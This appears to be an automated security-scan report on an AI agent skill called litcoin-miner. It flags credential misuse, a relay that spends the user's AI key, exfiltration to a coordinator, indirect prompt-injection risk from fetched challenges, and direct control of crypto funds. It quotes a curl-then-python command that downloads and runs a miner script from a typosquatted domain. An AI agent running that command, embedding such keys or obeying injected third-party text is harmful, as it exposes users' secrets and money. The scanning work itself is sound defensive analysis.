litcoin-miner

HIGH W007: Insecure credential handling detected in skill instructions.

• Insecure credential handling detected (high risk: 0.90). The prompt explicitly shows API keys (bankr_key, ai_key) being passed directly into code examples and instructs obtaining and using those keys, which encourages the agent to accept and embed secret values verbatim in outputs.

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 0.90). This skill contains multiple high-risk patterns: it auto‑starts a relay that uses the user's AI API key to serve third‑party inference (risking credential misuse, unexpected charges, and data leakage), instructs embedding a Bankr API key in MCP/env (exposing a secret that can be used to sign on‑chain claims/transactions by external processes/agents), sends user-submitted research/code to a coordinator that re‑runs submissions (remote code execution and IP/data exfiltration risk), encourages downloading and executing a remotely hosted miner script (supply‑chain risk, typosquatted domain litcoiin.xyz), and relies on UUPS upgradeable contracts (allowing later malicious upgrade/rug‑pull) — together these behaviors strongly suggest deliberate backdoor/abuse-capable design rather than an innocuous library.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 0.90). The skill explicitly fetches public mining and benchmark challenges from the coordinator API (e.g., GET /v1/challenge and benchmark endpoints at https://api.litcoiin.xyz referenced in SKILL.md), and the agent is required to read and solve those externally‑provided prose documents as part of mining/research, so untrusted third‑party content could steer its actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 0.90). The skill explicitly instructs fetching and executing remote code at runtime (curl -O https://litcoiin.xyz/litcoin_miner.py then python litcoin_miner.py) and also relies on runtime-installed packages/commands that execute remote code (pip install litcoin -> https://pypi.org/project/litcoin/ and npx litcoin-mcp -> https://www.npmjs.com/package/litcoin-mcp), so these external URLs/packages can directly execute code and influence agent behavior.

MEDIUM W009: Direct money access capability detected (payment gateways, crypto, banking).

• Direct money access detected (high risk: 1.00). The skill is explicitly a crypto/DeFi SDK that performs on-chain financial operations. It requires a Bankr API key (wallet proof) and ETH for gas and exposes methods that send transactions and manage funds: agent.claim() (claim rewards on-chain), agent.stake()/unstake()/upgrade_tier(), agent.open_vault(), agent.mint_litcredit(...), agent.repay_debt(...), agent.add_collateral(...)/withdraw_collateral(...)/close_vault(), agent.deposit_escrow(amount), agent.join_guild(guild_id, amount), agent.faucet(), and agent.balance() among others. The skill names chain (Base), token contract, and gas requirements, and the coordinator notes that Bankr API key resolves to a wallet for authorization. These are specific, purpose-built financial actions (crypto wallet interactions, minting, staking, vault management, depositing funds), not generic tooling — therefore it grants direct financial execution authority.